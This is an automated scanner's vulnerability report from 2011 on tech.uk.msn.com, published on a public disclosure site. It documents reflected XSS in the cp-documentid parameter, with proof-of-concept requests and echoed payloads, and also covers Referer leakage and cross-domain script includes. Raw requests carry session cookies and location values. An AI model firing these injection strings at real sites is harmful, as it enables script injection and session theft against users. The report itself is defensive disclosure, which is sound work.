XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, tech.uk.msn.com Report generated by XSS.CX at Fri Aug 19 10:21:55 GMT-06:00 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. Cross-site scripting (reflected)
1.1. http://tech.uk.msn.com/features/photos.aspx [cp-documentid parameter]
1.2. http://tech.uk.msn.com/microsoft/photos.aspx [cp-documentid parameter]
2. Cross-domain Referer leakage
2.1. http://tech.uk.msn.com/features/photos.aspx
2.2. http://tech.uk.msn.com/features/photos.aspx
2.3. http://tech.uk.msn.com/features/photos.aspx
2.4. http://tech.uk.msn.com/features/photos.aspx
2.5. http://tech.uk.msn.com/media/WeatherService.aspx
2.6. http://tech.uk.msn.com/media/articles.aspx
2.7. http://tech.uk.msn.com/media/articles.aspx
2.8. http://tech.uk.msn.com/microsoft/photos.aspx
2.9. http://tech.uk.msn.com/microsoft/photos.aspx
2.10. http://tech.uk.msn.com/phones/articles.aspx
2.11. http://tech.uk.msn.com/phones/articles.aspx
3. Cross-domain script include
3.1. http://tech.uk.msn.com/
3.2. http://tech.uk.msn.com/blog/tech-and-gadgets.aspx
3.3. http://tech.uk.msn.com/features/
3.4. http://tech.uk.msn.com/features/hands-on-google-chromebook
3.5. http://tech.uk.msn.com/features/photos.aspx
3.6. http://tech.uk.msn.com/media/articles.aspx
3.7. http://tech.uk.msn.com/microsoft/
3.8. http://tech.uk.msn.com/microsoft/bing/
3.9. http://tech.uk.msn.com/microsoft/essentials/
3.10. http://tech.uk.msn.com/microsoft/hotmail/
3.11. http://tech.uk.msn.com/microsoft/internet-explorer/
3.12. http://tech.uk.msn.com/microsoft/messenger/
3.13. http://tech.uk.msn.com/microsoft/office/
3.14. http://tech.uk.msn.com/microsoft/photos.aspx
3.15. http://tech.uk.msn.com/microsoft/windows-7/
3.16. http://tech.uk.msn.com/microsoft/xbox/
3.17. http://tech.uk.msn.com/news/
3.18. http://tech.uk.msn.com/news/teenager-bailed-on-hacking-charges-2
3.19. http://tech.uk.msn.com/phones/articles.aspx
3.20. http://tech.uk.msn.com/reviews/
1. Cross-site scripting (reflected)
next
There are 2 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://tech.uk.msn.com/features/photos.aspx [cp-documentid parameter]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/features/photos.aspx
Issue detail
The value of the cp-documentid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5a16"%3balert(1)//ca93e79f28b was submitted in the cp-documentid parameter. This input was echoed as c5a16";alert(1)//ca93e79f28b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /features/photos.aspx?cp-documentid=158635065c5a16"%3balert(1)//ca93e79f28b HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/features/%2526oid%253Dhttp%25253A//tech.uk.msn.com/features/photos.aspx%25253Fcp-documentid%25253D158635065%2526ot%253DA
Response
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA26 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:02:29 GMT Cteonnt-Length: 87996 Content-Length: 87996 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... op6="0"; s.prop7=""; s.prop9="IntlTechandGadgets"; s.prop10="9de2cb88-7b70-4c0c-87ec-b2acbaade4ca"; s.prop11="RnR"; s.prop12="urn:scp:IntlTechandGadgets:UK_ComputingTech:PG;14461583;157122251;158635065c5a16";alert(1)//ca93e79f28b ;IntlTechandGadgets;UK_ComputingTech"; s.prop13 = ""; s.prop14 = s.prop1 + " | " + s.prop2; s.prop15 = s.prop1 + " | " + s.prop3; s.prop16 = s.prop3 + " | " + s.prop2; s.prop17 = s.prop1 + " | " + s.pr...[SNIP]...
1.2. http://tech.uk.msn.com/microsoft/photos.aspx [cp-documentid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/photos.aspx
Issue detail
The value of the cp-documentid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d24cf"%3balert(1)//7afec70c63b was submitted in the cp-documentid parameter. This input was echoed as d24cf";alert(1)//7afec70c63b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /microsoft/photos.aspx?cp-documentid=157623778d24cf"%3balert(1)//7afec70c63b HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/microsoft/hotmail/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/microsoft/hotmail/%2526oid%253Dhttp%25253A//tech.uk.msn.com/microsoft/photos.aspx%25253Fcp-documentid%25253D157623778%2526ot%253DA
Response
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA30 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:03:33 GMT Cteonnt-Length: 86940 Content-Length: 86940 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... op6="0"; s.prop7=""; s.prop9="IntlTechandGadgets"; s.prop10="9de2cb88-7b70-4c0c-87ec-b2acbaade4ca"; s.prop11="RnR"; s.prop12="urn:scp:IntlTechandGadgets:UK_ComputingTech:PG;14461583;157183826;157623778d24cf";alert(1)//7afec70c63b ;IntlTechandGadgets;UK_ComputingTech"; s.prop13 = ""; s.prop14 = s.prop1 + " | " + s.prop2; s.prop15 = s.prop1 + " | " + s.prop3; s.prop16 = s.prop3 + " | " + s.prop2; s.prop17 = s.prop1 + " | " + s.pr...[SNIP]...
2. Cross-domain Referer leakage
previous
next
There are 11 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
2.1. http://tech.uk.msn.com/features/photos.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/features/photos.aspx
Issue detail
The page was loaded from a URL containing a query string:http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065c5a16%22%3balert(document.location)//ca93e79f28b The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://del.icio.us/submit?url=http://tech.uk.msn.com/features/photos.aspx&title= http://digg.com/submit?url=http://tech.uk.msn.com/features/photos.aspx http://go.microsoft.com/fwlink/?LinkId=74170 http://mail.live.com/ http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaldev.112.2o7.net/b/ss/msnportaldev/1/H.1--NS/0 http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/features/photos.aspx&t= http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://spaces.live.com/blogit.aspx?title=&sourceurl=http://tech.uk.msn.com/features/photos.aspx&description= http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/features/photos.aspx http://twitter.com/msntech http://www.bing.com/maps/ http://www.facebook.com/msnuktech http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/features/photos.aspx&t= http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/features/photos.aspx&title=&labels= http://www.messengergonemobile.com/ http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/features/photos.aspx&t=&c= http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/features/photos.aspx&h= http://www.reddit.com/submit?url=http://tech.uk.msn.com/features/photos.aspx&title= http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/features/photos.aspx&title= http://www.technorati.com/faves?add=http://tech.uk.msn.com/features/photos.aspx http://www.twitter.com/MSNTechVerity http://www.twitter.com/msntechnik http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376649&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Ffeatures%2Fphotos.aspx%3Fcp-documentid%3D158635065c5a16%2522%253balert(document.location)%2F%2Fca93e79f28b&lc=2057&id=1184
Request
GET /features/photos.aspx?cp-documentid=158635065c5a16%22%3balert(document.location)//ca93e79f28b HTTP/1.1 Host: tech.uk.msn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065c5a16%22%3balert(document.location)//ca93e79f28b Cookie: Sample=43; MUID=360F843730F542A7A6E2E0ACB7BADB9D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; MC1=V=3&GUID=7a7a208d81b949fbb5590485cae7a32c; mh=MSFT; CC=US; Sample=43; s_vnum=1314963712630%26vn%3D1; s_nr=1312371839517; s_cc=true; s_sq=%5B%5BB%5D%5D; IE9Overlay=0; IE9RemindMe=0 Cache-Control: max-age=0
Response
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA32 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:04:09 GMT Cteonnt-Length: 96886 Content-Length: 96886 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </script><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376649&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Ffeatures%2Fphotos.aspx%3Fcp-documentid%3D158635065c5a16%2522%253balert(document.location)%2F%2Fca93e79f28b&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <li class="first jspopup"><a href="http://del.icio.us/submit?url=http://tech.uk.msn.com/features/photos.aspx&title=" title="Share this page on Del.icio.us" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/53/B85B6DFFC77EF9D86D931DDD3BDEC2.gif" width="16" height="16" alt="Share this page on Del.icio.us" />...[SNIP]... <li class=" jspopup"><a href="http://digg.com/submit?url=http://tech.uk.msn.com/features/photos.aspx" title="Share this page on Digg" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/28/77813148B142EF4F4DCEE7372FC215.jpg" width="16" height="16" alt="Share this page on Digg" />...[SNIP]... <li class=" jspopup"><a href="http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/features/photos.aspx&t=" title="Share this page on Facebook" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/FB/2B2C772B1EAFB0B6D239B186342DCD.gif" width="16" height="16" alt="Share this page on Facebook" />...[SNIP]... <li class=" jspopup"><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/features/photos.aspx&title=&labels=" title="Share this page on Google" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/7C/87B79F50DDC866686CE934324DC987.jpg" width="16" height="16" alt="Share this page on Google" />...[SNIP]... <li class=" jspopup"><a href="http://spaces.live.com/blogit.aspx?title=&sourceurl=http://tech.uk.msn.com/features/photos.aspx&description=" title="Share this page on Live Spaces" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/D2/FF2F70CAE8D665193EC71CE3ABE168.png" width="16" height="16" alt="Share this page on Live Spaces" />...[SNIP]... <li class=" jspopup"><a href="http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/features/photos.aspx&t=&c=" title="Share this page on MySpace" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/85/59DAE3AC143A3D9ECF2F375FBF1EBA.png" width="16" height="16" alt="Share this page on MySpace" />...[SNIP]... <li class=" jspopup"><a href="http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/features/photos.aspx&h=" title="Share this page on Newsvine" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/65/B9C2369C5C6C5BA049C34D1F79594.png" width="16" height="16" alt="Share this page on Newsvine" />...[SNIP]... <li class=" jspopup"><a href="http://www.reddit.com/submit?url=http://tech.uk.msn.com/features/photos.aspx&title=" title="Share this page on Reddit" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/EF/40D0FC9056526E4B5AD585674B335B.png" width="16" height="16" alt="Share this page on Reddit" />...[SNIP]... <li class=" jspopup"><a href="http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/features/photos.aspx&title=" title="Share this page on Stumbleupon" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/31/308235FD5523ECAFB8D864EAFCF570.gif" width="16" height="16" alt="Share this page on Stumbleupon" />...[SNIP]... <li class=" jspopup"><a href="http://www.technorati.com/faves?add=http://tech.uk.msn.com/features/photos.aspx" title="Share this page on Technorati" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/2E/5AF3E3DE428277901BD070D694686B.gif" width="16" height="16" alt="Share this page on Technorati" />...[SNIP]... <li class=" jspopup"><a href="http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/features/photos.aspx" title="Share this page on Twitter" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/33/8C170158BB1EC51A16272BCD6F71C.gif" width="16" height="16" alt="Share this page on Twitter" />...[SNIP]... <li class="last jspopup"><a href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/features/photos.aspx&t=" title="Share this page on Yahoo! My Web" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/B0/B5F992DCBB333A2421AAB18CB173.gif" width="16" height="16" alt="Share this page on Yahoo! My Web" />...[SNIP]... <li><a href="http://www.twitter.com/msntechnik"> <img src="http://estb.msn.com/i/A0/73EE55691874B316843CF17518A313.jpg" width="135" height="81" alt="Nik Taylor (MSN)" /></a><a href="http://www.twitter.com/msntechnik"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/msnuktech"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/msnuktech"> <strong>...[SNIP]... <li><a href="http://www.twitter.com/MSNTechVerity"> <img src="http://estb.msn.com/i/70/46399762CCCE49B80C97A5539134.jpg" width="135" height="81" alt="Verity Burns (MSN)" /></a><a href="http://www.twitter.com/MSNTechVerity"> <strong>...[SNIP]... <li class=" cb"><a href="http://twitter.com/msntech"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @msntech on Twitter (Twitter)" /></a><a href="http://twitter.com/msntech"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
2.2. http://tech.uk.msn.com/features/photos.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/features/photos.aspx
Issue detail
The page was loaded from a URL containing a query string:http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065 The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://del.icio.us/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://digg.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065 http://go.microsoft.com/fwlink/?LinkId=74170 http://mail.live.com/ http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaldev.112.2o7.net/b/ss/msnportaldev/1/H.1--NS/0 http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://spaces.live.com/blogit.aspx?title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&sourceurl=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&description=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop. http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065 http://twitter.com/msntech http://twitter.com/share http://www.bing.com/maps/ http://www.facebook.com/msnuktech http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&labels=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop. http://www.messengergonemobile.com/ http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&c=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop. http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&h=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://www.reddit.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://www.technorati.com/faves?add=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065 http://www.twitter.com/MSNTechVerity http://www.twitter.com/msntechnik http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376411&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Ffeatures%2Fphotos.aspx%3Fcp-documentid%3D158635065&lc=2057&id=1184
Request
